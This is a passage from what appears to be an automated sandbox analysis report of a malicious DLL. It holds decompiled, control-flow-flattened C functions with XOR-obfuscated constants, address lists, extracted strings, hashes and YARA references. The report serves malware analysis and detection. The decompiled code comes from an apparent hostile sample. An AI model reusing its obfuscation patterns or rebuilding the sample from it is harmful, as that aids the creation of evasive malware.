									_t446 = _t446 + 0x10;
									__eflags = _t378;
									if(_t378 == 0) {
										_t373 = 1;
										 *(_t446 + 0xb0) = 1;
									} else {
										goto L19;
									}
									L24:
									_t440 =  *(_t446 + 0x68);
									goto L25;
									L19:
									_t376 =  *_t442;
									__eflags = _t376;
									if(_t376 == 0) {
										_t373 =  *(_t446 + 0xb0);
									} else {
										_t442 = _t442 + _t376;
										__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
										if( *((intOrPtr*)(_t442 + 4)) != 4) {
											goto L19;
										}
									}
									goto L24;
								}
							}
							L25:
							__eflags = _t373;
							if(__eflags == 0) {
								_t369 = 0x667bbe4;
								_t395 = 0x667bbe4;
								continue;
							} else {
								_t374 =  *0x10021404; // 0x0
								E10017309( *(_t446 + 0x94),  *(_t446 + 0x4c),  *_t374);
								_t395 = 0x3007dbb6;
								goto L1;
							}
							L31:
						} else {
							if(_t395 == 0x133ba569) {
								E10008C0C( *((intOrPtr*)(_t446 + 0x30)), __eflags,  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0xac), _t446 + 0xc4);
								_t383 = E10001E13( *((intOrPtr*)(_t446 + 0x28)),  *(_t446 + 0x88),  *(_t446 + 0xb0),  *(_t446 + 0xa0), _t446 + 0xd0);
								_t444 = _t383;
								_t446 = _t446 + 0x18;
								_t395 = 0x1f405b52;
								 *((short*)(_t383 - 2)) = 0;
								while(1) {
									L1:
									_t369 = 0x667bbe4;
									goto L2;
								}
							} else {
								if(_t395 == 0x1614145d) {
									_t440 = 0x1000;
									_push(_t395);
									 *(_t446 + 0x6c) = 0x1000;
									_t432 = E100157E8(0x1000);
									_t369 = 0x667bbe4;
									__eflags = _t432;
									_t395 =  !=  ? 0x667bbe4 : 0x333430e;
									continue;
								} else {
									if(_t395 == 0x19391156) {
										_t395 = 0x133ba569;
										continue;
									} else {
										if(_t395 == 0x1f405b52) {
											_t389 = E1000492A( *(_t446 + 0x5c),  *(_t446 + 0x4c) | 0x00000006,  *(_t446 + 0x74),  *(_t446 + 0x5c),  *((intOrPtr*)(_t446 + 0xd0)), _t395, 1,  *(_t446 + 0x2c), _t395, _t446 + 0xc8, 0x2000000,  *(_t446 + 0x74),  *(_t446 + 0x68),  *((intOrPtr*)(_t446 + 0xa4)));
											_t393 = _t389;
											_t446 = _t446 + 0x30;
											__eflags = _t389 - 0xffffffff;
											if(__eflags != 0) {
												_t395 = 0x1614145d;
												while(1) {
													L1:
													_t369 = 0x667bbe4;
													goto L2;
												}
											}
										} else {
											if(_t395 != 0x3007dbb6) {
												L29:
												__eflags = _t395 - 0x35dcba61;
												if(__eflags != 0) {
													continue;
												}
											} else {
												E100091CD( *((intOrPtr*)(_t446 + 0x84)),  *((intOrPtr*)(_t446 + 0xa4)),  *(_t446 + 0xa8), _t432,  *(_t446 + 0x80));
												_t446 = _t446 + 0xc;
												_t395 = 0x333430e;
												while(1) {
													L1:
													_t369 = 0x667bbe4;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L31;
					}
					E100078F0(_t393,  *(_t446 + 0x44),  *(_t446 + 0x44),  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0x54));
					_t446 = _t446 + 0xc;
					_t395 = 0x35dcba61;
					_t369 = 0x667bbe4;
					goto L29;
				}
			}

0x10016b4b
0x10016b58
0x10016b61
0x10016b6c
0x10016b71
0x10016b79
0x10016b7e
0x10016b86
0x10016b8e
0x10016b96
0x10016b9e
0x10016ba3
0x10016bab
0x10016bb3
0x10016bbb
0x10016bc2
0x10016bcb
0x10016bcf
0x10016bd4
0x10016bdc
0x10016be4
0x10016bef
0x10016bf2
0x10016bf6
0x10016bfe
0x10016c09
0x10016c14
0x10016c1f
0x10016c27
0x10016c2c
0x10016c34
0x10016c39
0x10016c41
0x10016c49
0x10016c51
0x10016c59
0x10016c64
0x10016c6f
0x10016c7a
0x10016c90
0x10016c97
0x10016ca2
0x10016caa
0x10016caf
0x10016cb7
0x10016cbf
0x10016ccb
0x10016cd0
0x10016cd6
0x10016cdb
0x10016ce3
0x10016ceb
0x10016cf6
0x10016d01
0x10016d0c
0x10016d14
0x10016d1c
0x10016d24
0x10016d29
0x10016d31
0x10016d3d
0x10016d40
0x10016d44
0x10016d4c
0x10016d5c
0x10016d61
0x10016d67
0x10016d6f
0x10016d77
0x10016d82
0x10016d8a
0x10016d95
0x10016da8
0x10016dab
0x10016db2
0x10016dbd
0x10016dc5
0x10016dca
0x10016dcf
0x10016dd7
0x10016ddf
0x10016de4
0x10016de9
0x10016df1
0x10016df9
0x10016e01
0x10016e09
0x10016e11
0x10016e1e
0x10016e28
0x10016e2c
0x10016e34
0x10016e3c
0x10016e44
0x10016e49
0x10016e51
0x10016e59
0x10016e5e
0x10016e66
0x10016e6e
0x10016e76
0x10016e7e
0x10016e83
0x10016e8b
0x10016e93
0x10016e9e
0x10016ea9
0x10016eb4
0x10016ebc
0x10016ec1
0x10016ec9
0x10016ece
0x10016ed6
0x10016ee1
0x10016eec
0x10016ef7
0x10016eff
0x10016f07
0x10016f0f
0x10016f14
0x10016f1c
0x10016f27
0x10016f2f
0x10016f3a
0x10016f42
0x10016f4a
0x10016f52
0x10016f5a
0x10016f62
0x10016f6a
0x10016f74
0x10016f86
0x10016f8b
0x10016f8f
0x10016f96
0x10016fa1
0x10016fac
0x10016fb4
0x10016fbf
0x10016fca
0x10016fd5
0x10016fe0
0x10016fe8
0x10016ff0
0x10016ff8
0x10017000
0x10017008
0x10017010
0x10017018
0x10017020
0x10017028
0x10017030
0x10017035
0x1001703a
0x10017042
0x1001704a
0x10017052
0x10017057
0x1001705f
0x1001706d
0x10017071
0x10017075
0x10017079
0x1001707d
0x10017087
0x1001708b
0x10017093
0x10017093
0x10017093
0x00000000
0x10017098
0x100170a6
0x10017232
0x10017237
0x1001723a
0x1001723c
0x10017284
0x1001723e
0x1001723e
0x10017240
0x10017240
0x10017244
0x00000000
0x00000000
0x10017246
0x1001724a
0x10017262
0x10017267
0x1001726a
0x1001726c
0x1001727a
0x1001727b
0x00000000
0x00000000
0x00000000
0x10017294
0x10017294
0x00000000
0x1001726e
0x1001726e
0x10017270
0x10017272
0x1001728d
0x10017274
0x10017274
0x10017240
0x10017244
0x00000000
0x00000000
0x10017244
0x00000000
0x10017272
0x10017240
0x10017298
0x10017298
0x1001729a
0x100172be
0x100172c3
0x00000000
0x1001729c
0x1001729c
0x100172ae
0x100172b4
0x00000000
0x100172b4
0x00000000
0x100170ac
0x100170b2
0x100171bf
0x100171e5
0x100171ea
0x100171ec
0x100171f1
0x100171f6
0x10017093
0x10017093
0x10017093
0x00000000
0x10017093
0x100170b8
0x100170be
0x10017179
0x10017185
0x10017188
0x10017191
0x10017193
0x10017199
0x100171a0
0x00000000
0x100170c4
0x100170ca
0x1001716b
0x00000000
0x100170d0
0x100170d6
0x1001714e
0x10017153
0x10017155
0x10017158
0x1001715b
0x10017161
0x10017093
0x10017093
0x10017093
0x00000000
0x10017093
0x10017093
0x100170d8
0x100170de
0x100172ee
0x100172ee
0x100172f4
0x00000000
0x00000000
0x100170e4
0x10017101
0x10017106
0x10017109
0x10017093
0x10017093
0x10017093
0x00000000
0x10017093
0x10017093
0x100170de
0x100170d6
0x100170ca
0x100170be
0x100170b2
0x100172fd
0x10017306
0x00000000
0x10017306
0x100172dc
0x100172e1
0x100172e4
0x100172e9
0x00000000
0x100172e9

Strings

), xrefs: 10016CEB
'c, xrefs: 10016F42
[e, xrefs: 10016C41
O, xrefs: 10016D8A
D, xrefs: 10016F5A
#7}, xrefs: 10016BC2
vc, xrefs: 10016FE0
yw, xrefs: 10016C97
kg, xrefs: 10017057
ns, xrefs: 10016BDC

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #7}$'c$)$D$[e$kg$ns$vc$yw$O
API String ID: 0-1013673946
Opcode ID: 3dacd4352d9c33c1731b4215249d3e15c2e411b10bbaa018ca579d51b917f277
Instruction ID: f2670378fa826e8d31e23e03b62a8b8a54816961439a19b05cfa054466784345
Opcode Fuzzy Hash: 3dacd4352d9c33c1731b4215249d3e15c2e411b10bbaa018ca579d51b917f277
Instruction Fuzzy Hash: 250211711083809FE3A8CF21C58AA5FBBF1FBC5758F10891DE59A862A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000C07D, Relevance: 12.8, Strings: 10, Instructions: 296
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000C07D(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t249;
				intOrPtr _t273;
				intOrPtr _t275;
				void* _t292;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				intOrPtr* _t318;
				signed int _t319;
				intOrPtr* _t322;
				signed int* _t324;
				void* _t327;

				_push(_a8);
				_t322 = __edx;
				_t318 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t249);
				_v16 = 0x7669;
				_t324 =  &(( &_v120)[4]);
				_v16 = _v16 << 0xc;
				_v16 = _v16 ^ 0x0766ed4f;
				_t292 = 0;
				_v96 = 0xa3dc;
				_t319 = 0xc83da09;
				_v96 = _v96 << 0x10;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 ^ 0xd5d56a35;
				_v96 = _v96 ^ 0xd5c17d1d;
				_v88 = 0x57ea;
				_t294 = 0x44;
				_v88 = _v88 * 0x5e;
				_v88 = _v88 * 0x6d;
				_v88 = _v88 ^ 0xe3cf2272;
				_v88 = _v88 ^ 0xee71a60d;
				_v92 = 0x3245;
				_v92 = _v92 >> 9;
				_v92 = _v92 >> 7;
				_v92 = _v92 ^ 0xb732a7fa;
				_v92 = _v92 ^ 0xb732c7ae;
				_v40 = 0x3209;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 + 0xffff23da;
				_v40 = _v40 ^ 0xffff5649;
				_v44 = 0xfee;
				_v44 = _v44 * 0x3a;
				_v44 = _v44 + 0xffff023b;
				_v44 = _v44 ^ 0x00028194;
				_v20 = 0x6fe9;
				_v20 = _v20 ^ 0x83bafbf8;
				_v20 = _v20 ^ 0x83baebed;
				_v52 = 0x55fd;
				_v52 = _v52 >> 3;
				_v52 = _v52 / _t294;
				_v52 = _v52 ^ 0x00006fa3;
				_v56 = 0x7487;
				_t295 = 0x59;
				_v56 = _v56 / _t295;
				_v56 = _v56 + 0xca5f;
				_v56 = _v56 ^ 0x000097d2;
				_v60 = 0x67db;
				_v60 = _v60 + 0xffff6270;
				_v60 = _v60 ^ 0xc598274b;
				_v60 = _v60 ^ 0x3a67f21b;
				_v24 = 0x2803;
				_v24 = _v24 ^ 0x5736d0c5;
				_v24 = _v24 ^ 0x5736adce;
				_v28 = 0x6556;
				_v28 = _v28 ^ 0x16a4143a;
				_v28 = _v28 ^ 0x16a44fe2;
				_v64 = 0x2652;
				_v64 = _v64 << 1;
				_v64 = _v64 * 0x60;
				_v64 = _v64 ^ 0x001ca86e;
				_v116 = 0xa093;
				_v116 = _v116 | 0x704eabb3;
				_v116 = _v116 >> 0xe;
				_t296 = 0x26;
				_v116 = _v116 * 0x25;
				_v116 = _v116 ^ 0x0040c4bc;
				_v80 = 0xb33b;
				_v80 = _v80 >> 6;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 ^ 0x000057d5;
				_v120 = 0xdf18;
				_v120 = _v120 | 0xefceebfd;
				_v120 = _v120 + 0xf560;
				_v120 = _v120 ^ 0xefcfb7f2;
				_v84 = 0x84bb;
				_v84 = _v84 ^ 0xda107d20;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x10f9b229;
				_v68 = 0xeff9;
				_v68 = _v68 / _t296;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 ^ 0x00000bea;
				_v100 = 0x20d7;
				_v100 = _v100 >> 3;
				_t297 = 0x59;
				_v100 = _v100 * 0x53;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00004dbe;
				_v104 = 0x1634;
				_v104 = _v104 | 0xa08b3358;
				_v104 = _v104 * 0x64;
				_v104 = _v104 | 0xcfa784de;
				_v104 = _v104 ^ 0xffe789e4;
				_v108 = 0x3cd;
				_v108 = _v108 | 0xda478b90;
				_v108 = _v108 ^ 0x76068ebd;
				_v108 = _v108 * 0x60;
				_v108 = _v108 ^ 0x986216c6;
				_v112 = 0x5ea3;
				_v112 = _v112 * 0x50;
				_v112 = _v112 / _t297;
				_v112 = _v112 >> 6;
				_v112 = _v112 ^ 0x0000527a;
				_v32 = 0x8038;
				_v32 = _v32 + 0xffff845e;
				_v32 = _v32 ^ 0x00005668;
				_v72 = 0x3956;
				_v72 = _v72 ^ 0xc34d822a;
				_v72 = _v72 | 0x19b55510;
				_v72 = _v72 ^ 0xdbfdff55;
				_v36 = 0x9b67;
				_v36 = _v36 >> 5;
				_v36 = _v36 ^ 0x00004f8e;
				_v76 = 0x4339;
				_v76 = _v76 + 0xfffff79c;
				_v76 = _v76 + 0x9b18;
				_v76 = _v76 ^ 0x00009e95;
				while(1) {
					_t268 = _v48;
					while(1) {
						L2:
						_t327 = _t319 - 0x26339395;
						if(_t327 > 0) {
							break;
						}
						if(_t327 == 0) {
							_push(_t297);
							E10005B05(_v68,  *((intOrPtr*)( *0x100221b4 + 0x14)), _t297, _v8, _v100, _v104, _t297, _v108, _v112, _v32, _v12);
							_t324 =  &(_t324[0xa]);
							_t297 = 1;
							_t319 = 0x1081595e;
							_t292 =  !=  ? 1 : _t292;
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						if(_t319 == 0xc83da09) {
							_t319 = 0x357aa1fe;
							continue;
						}
						if(_t319 == 0x1081595e) {
							E1000D7B0(_v12);
							_t297 = _t297;
							_t319 = 0x172012b8;
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						if(_t319 == 0x16b83fff) {
							_t319 = 0x2f4aaa5a;
							continue;
						}
						if(_t319 == 0x172012b8) {
							if(_t292 == 0) {
								E100091CD(_v88, _v92, _v40,  *_t318, _v44);
							}
							L29:
							return _t292;
						}
						if(_t319 != 0x24206dd0) {
							L25:
							if(_t319 == 0x2ef876fe) {
								goto L29;
							}
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						E10001BB6(_t318 + 4, _v116, _t297,  *_t318, _v12, _v80,  *((intOrPtr*)( *0x100221b4)), _v120, _v84);
						_t324 =  &(_t324[8]);
						asm("sbb esi, esi");
						_t319 = (_t319 & 0x15b23a37) + 0x1081595e;
						while(1) {
							_t268 = _v48;
							goto L2;
						}
					}
					if(_t319 == 0x2f4aaa5a) {
						 *((intOrPtr*)(_t318 + 4)) = _a4 - 0x74;
						_t273 = E100157E8( *((intOrPtr*)(_t318 + 4)));
						 *_t318 = _t273;
						_t297 = _t297;
						if(_t273 == 0) {
							_t319 = 0x2ef876fe;
							goto L25;
						}
						_t275 =  *_t322;
						_t319 = 0x357ef6c4;
						_v8 = _t275;
						_v4 = _t275 + 0x74;
						_t268 = _a4 - 0x74;
						_v48 = _a4 - 0x74;
						goto L2;
					}
					if(_t319 == 0x357aa1fe) {
						if(_a4 < 0x74) {
							goto L29;
						}
						_t319 = 0x16b83fff;
						goto L2;
					}
					if(_t319 == 0x357ef6c4) {
						_t297 = _v20;
						E1000CB42(_t297, _v52, _v56, _t297,  &_v12,  *((intOrPtr*)( *0x100221b4 + 0x10)), _t297, _v60);
						_t324 =  &(_t324[6]);
						asm("sbb esi, esi");
						_t319 = (_t319 & 0x23df12f3) + 0x172012b8;
						while(1) {
							_t268 = _v48;
							goto L2;
						}
					}
					if(_t319 != 0x3aff25ab) {
						goto L25;
					}
					_t297 = _v24;
					E10009970(_t297, _v4, _v28,  *_t318, _t268, _v64);
					_t324 =  &(_t324[4]);
					_t319 = 0x24206dd0;
				}
			}

0x1000c084
0x1000c08b
0x1000c08d
0x1000c08f
0x1000c096
0x1000c097
0x1000c098
0x1000c09d
0x1000c0a8
0x1000c0ab
0x1000c0b2
0x1000c0ba
0x1000c0bc
0x1000c0c4
0x1000c0c9
0x1000c0ce
0x1000c0d3
0x1000c0db
0x1000c0e3
0x1000c0f2
0x1000c0f5
0x1000c0fe
0x1000c102
0x1000c10a
0x1000c112
0x1000c11a
0x1000c11f
0x1000c124
0x1000c12c
0x1000c134
0x1000c13c
0x1000c141
0x1000c149
0x1000c151
0x1000c15e
0x1000c162
0x1000c16a
0x1000c172
0x1000c17a
0x1000c182
0x1000c18a
0x1000c192
0x1000c19f
0x1000c1a3
0x1000c1ab
0x1000c1b7
0x1000c1ba
0x1000c1be
0x1000c1c6
0x1000c1ce
0x1000c1d6
0x1000c1de
0x1000c1e6
0x1000c1ee
0x1000c1f6
0x1000c1fe
0x1000c206
0x1000c20e
0x1000c216
0x1000c21e
0x1000c226
0x1000c22f
0x1000c233
0x1000c23b
0x1000c243
0x1000c24b
0x1000c259
0x1000c25c
0x1000c260
0x1000c268
0x1000c270
0x1000c275
0x1000c27a
0x1000c282
0x1000c28a
0x1000c292
0x1000c29a
0x1000c2a2
0x1000c2aa
0x1000c2b2
0x1000c2b7
0x1000c2bf
0x1000c2cf
0x1000c2d3
0x1000c2d8
0x1000c2e0
0x1000c2e8
0x1000c2f2
0x1000c2f3
0x1000c2f7
0x1000c2fc
0x1000c304
0x1000c30c
0x1000c319
0x1000c31d
0x1000c325
0x1000c32d
0x1000c335
0x1000c33d
0x1000c34a
0x1000c34e
0x1000c356
0x1000c363
0x1000c36d
0x1000c371
0x1000c376
0x1000c37e
0x1000c386
0x1000c38e
0x1000c396
0x1000c39e
0x1000c3a6
0x1000c3ae
0x1000c3b6
0x1000c3be
0x1000c3c3
0x1000c3cb
0x1000c3d3
0x1000c3db
0x1000c3e3
0x1000c3eb
0x1000c3eb
0x1000c3ef
0x1000c3ef
0x1000c3ef
0x1000c3f5
0x00000000
0x00000000
0x1000c3fb
0x1000c4af
0x1000c4e1
0x1000c4e8
0x1000c4eb
0x1000c4ec
0x1000c4f3
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c407
0x1000c4a5
0x00000000
0x1000c4a5
0x1000c413
0x1000c494
0x1000c49a
0x1000c49b
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c41b
0x1000c476
0x00000000
0x1000c476
0x1000c423
0x1000c605
0x1000c619
0x1000c61e
0x1000c624
0x1000c62a
0x1000c62a
0x1000c42f
0x1000c5f6
0x1000c5fc
0x00000000
0x00000000
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c459
0x1000c45e
0x1000c463
0x1000c46b
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c501
0x1000c5ae
0x1000c5bd
0x1000c5c2
0x1000c5c4
0x1000c5c7
0x1000c5f1
0x00000000
0x1000c5f1
0x1000c5c9
0x1000c5cc
0x1000c5d1
0x1000c5db
0x1000c5e5
0x1000c5e8
0x00000000
0x1000c5e8
0x1000c50d
0x1000c598
0x00000000
0x00000000
0x1000c59e
0x00000000
0x1000c59e
0x1000c519
0x1000c570
0x1000c577
0x1000c57c
0x1000c581
0x1000c589
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c521
0x00000000
0x00000000
0x1000c539
0x1000c540
0x1000c545
0x1000c548
0x1000c548

Strings

Ve, xrefs: 1000C206
o, xrefs: 1000C172
E2, xrefs: 1000C112
2, xrefs: 1000C134
V9, xrefs: 1000C396
iv, xrefs: 1000C09D
R&, xrefs: 1000C21E
zR, xrefs: 1000C376
9C, xrefs: 1000C3CB
hV, xrefs: 1000C38E

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2$9C$E2$R&$V9$Ve$hV$iv$zR$o
API String ID: 0-2458788695
Opcode ID: cde8fb4cfcbe2daa5d61ed075c86a642f744566edfd9abd8c45c0297c1402669
Instruction ID: b889abdc94fa4b4a1718a1273814a5ecfb06dcf28629aab6822f019f45cdcd48
Opcode Fuzzy Hash: cde8fb4cfcbe2daa5d61ed075c86a642f744566edfd9abd8c45c0297c1402669
Instruction Fuzzy Hash: 1AE1217240C3819FE358CF64C98A90BBBF0FB84794F60891DF595862A4D7B59A49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10015DAA, Relevance: 12.8, Strings: 10, Instructions: 290
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10015DAA(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* _t312;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				intOrPtr _t365;
				void* _t366;
				signed int* _t368;
				void* _t376;

				_t368 =  &_v144;
				_v16 = 0x2f11e5;
				_v12 = 0x125d40;
				_t365 = 0;
				_t338 = __ecx;
				_v8 = 0;
				_t366 = 0x358f7696;
				_v4 = 0;
				_v132 = 0xdcb7;
				_t340 = 0x6f;
				_v132 = _v132 / _t340;
				_t341 = 0x48;
				_v132 = _v132 / _t341;
				_v132 = _v132 + 0xfffff0ee;
				_v132 = _v132 ^ 0xffff84cc;
				_v28 = 0x3643;
				_v28 = _v28 + 0xffff4038;
				_v28 = _v28 ^ 0xffff36c8;
				_v84 = 0x2397;
				_v84 = _v84 ^ 0x715e3b83;
				_v84 = _v84 + 0xb2b;
				_v84 = _v84 ^ 0x715e6259;
				_v92 = 0x7fa0;
				_t342 = 0xd;
				_v92 = _v92 * 0x4c;
				_v92 = _v92 | 0x3035aed7;
				_v92 = _v92 ^ 0x3035c4a3;
				_v32 = 0x3c7c;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0x078f867d;
				_v124 = 0xd3cb;
				_v124 = _v124 << 0xa;
				_v124 = _v124 / _t342;
				_v124 = _v124 << 3;
				_v124 = _v124 ^ 0x020946e5;
				_v68 = 0x8f72;
				_t343 = 0x68;
				_v68 = _v68 / _t343;
				_v68 = _v68 * 0x26;
				_v68 = _v68 ^ 0x00002cf4;
				_v76 = 0xb700;
				_v76 = _v76 >> 0xf;
				_v76 = _v76 | 0x3f1719c8;
				_v76 = _v76 ^ 0x3f176b52;
				_v80 = 0x2c59;
				_v80 = _v80 | 0xf2308069;
				_v80 = _v80 ^ 0x9e8457c3;
				_v80 = _v80 ^ 0x6cb4c9eb;
				_v128 = 0xbaba;
				_v128 = _v128 | 0x1d3dda76;
				_v128 = _v128 ^ 0x5e21119f;
				_v128 = _v128 + 0xffffe525;
				_v128 = _v128 ^ 0x431cc63a;
				_v72 = 0xdca3;
				_v72 = _v72 * 0x15;
				_v72 = _v72 * 0x47;
				_v72 = _v72 ^ 0x05054403;
				_v88 = 0x680b;
				_v88 = _v88 ^ 0xdb65b47e;
				_v88 = _v88 + 0xffff3c9f;
				_v88 = _v88 ^ 0xdb654b07;
				_v40 = 0xa6e8;
				_t344 = 0x51;
				_v40 = _v40 * 0x47;
				_v40 = _v40 ^ 0x002e2907;
				_v48 = 0xe244;
				_v48 = _v48 + 0xe070;
				_v48 = _v48 ^ 0x0001a9ff;
				_v52 = 0xb9c7;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x000022fe;
				_v36 = 0xc27e;
				_v36 = _v36 * 0x12;
				_v36 = _v36 ^ 0x000dd66f;
				_v120 = 0xc6aa;
				_v120 = _v120 | 0x840c2d9c;
				_v120 = _v120 << 5;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x3beff1bc;
				_v64 = 0x26b9;
				_v64 = _v64 * 0x17;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x0000525e;
				_v136 = 0x331a;
				_v136 = _v136 ^ 0xe6942da9;
				_v136 = _v136 / _t344;
				_v136 = _v136 + 0x45e7;
				_v136 = _v136 ^ 0x02d904bd;
				_v60 = 0xefe2;
				_v60 = _v60 ^ 0xb768827f;
				_t345 = 0x5a;
				_v60 = _v60 / _t345;
				_v60 = _v60 ^ 0x0209f4de;
				_v44 = 0x996d;
				_v44 = _v44 + 0xeb77;
				_v44 = _v44 ^ 0x0001ce3e;
				_v140 = 0xaea2;
				_v140 = _v140 + 0xffff7943;
				_v140 = _v140 + 0xffff713c;
				_v140 = _v140 << 1;
				_v140 = _v140 ^ 0xffff0950;
				_v144 = 0xe8a6;
				_v144 = _v144 + 0xffff5365;
				_v144 = _v144 << 9;
				_v144 = _v144 + 0xffffbb33;
				_v144 = _v144 ^ 0x0077ca81;
				_v104 = 0x7543;
				_v104 = _v104 + 0xd62a;
				_v104 = _v104 | 0x34ced3cc;
				_v104 = _v104 ^ 0x34cfd1d4;
				_v96 = 0x479b;
				_v96 = _v96 >> 3;
				_v96 = _v96 * 0x1b;
				_v96 = _v96 ^ 0x0000f726;
				_v20 = 0xd19;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00019a3d;
				_v112 = 0x2f15;
				_v112 = _v112 ^ 0x9e3db849;
				_v112 = _v112 >> 9;
				_v112 = _v112 * 0x50;
				_v112 = _v112 ^ 0x18b9e394;
				_v56 = 0xf91;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003e129f;
				_v108 = 0x8d56;
				_v108 = _v108 << 0xf;
				_v108 = _v108 ^ 0xf3b2534b;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 ^ 0x0000885e;
				_v116 = 0x58ab;
				_v116 = _v116 ^ 0x39457795;
				_v116 = _v116 << 7;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0028ab23;
				_v24 = 0xe1b7;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x0386d299;
				_v100 = 0x8399;
				_v100 = _v100 ^ 0xb4057ac8;
				_v100 = _v100 ^ 0x810196d4;
				_v100 = _v100 ^ 0x3504142b;
				goto L1;
				do {
					while(1) {
						L1:
						_t376 = _t366 - 0x1f0dfb0b;
						if(_t376 > 0) {
							break;
						}
						if(_t376 == 0) {
							_t320 = E10007544(_v44, _v140, _v144, _t338 + 0x18, _v104);
							_t368 =  &(_t368[3]);
							_t366 = 0x177163fa;
							_t365 = _t365 + _t320;
							continue;
						} else {
							if(_t366 == 0x5c5105d) {
								_t365 = _t365 + E10007E30();
							} else {
								if(_t366 == 0xe774bfd) {
									_t330 = E10007E30();
									_t368 = _t368 - 0xc + 0xc;
									_t366 = 0x24a30213;
									_t365 = _t365 + _t330;
									continue;
								} else {
									if(_t366 == 0x1438015d) {
										_t335 = E10007E30();
										_t368 = _t368 - 0xc + 0xc;
										_t366 = 0x1f0dfb0b;
										_t365 = _t365 + _t335;
										continue;
									} else {
										if(_t366 != 0x177163fa) {
											goto L19;
										} else {
											_t337 = E10007544(_v96, _v20, _v112, _t338 + 0x20, _v56);
											_t368 =  &(_t368[3]);
											_t366 = 0x5c5105d;
											_t365 = _t365 + _t337;
											continue;
										}
									}
								}
							}
						}
						L22:
						return _t365;
					}
					if(_t366 == 0x21c96020) {
						_t312 = E10007E30();
						_t368 = _t368 - 0xc + 0xc;
						_t366 = 0xe774bfd;
						_t365 = _t365 + _t312;
						goto L19;
					} else {
						if(_t366 == 0x24a30213) {
							_t317 = E10007E30();
							_t368 = _t368 - 0xc + 0xc;
							_t366 = 0x1438015d;
							_t365 = _t365 + _t317;
							goto L1;
						} else {
							if(_t366 == 0x25585055) {
								_t318 = E10007544(_v132, _v28, _v84, _t338, _v92);
								_t368 =  &(_t368[3]);
								_t366 = 0x21c96020;
								_t365 = _t365 + _t318;
								goto L1;
							} else {
								if(_t366 != 0x358f7696) {
									goto L19;
								} else {
									_t366 = 0x25585055;
									goto L1;
								}
							}
						}
					}
					goto L22;
					L19:
				} while (_t366 != 0xd1eac77);
				goto L22;
			}

0x10015daa
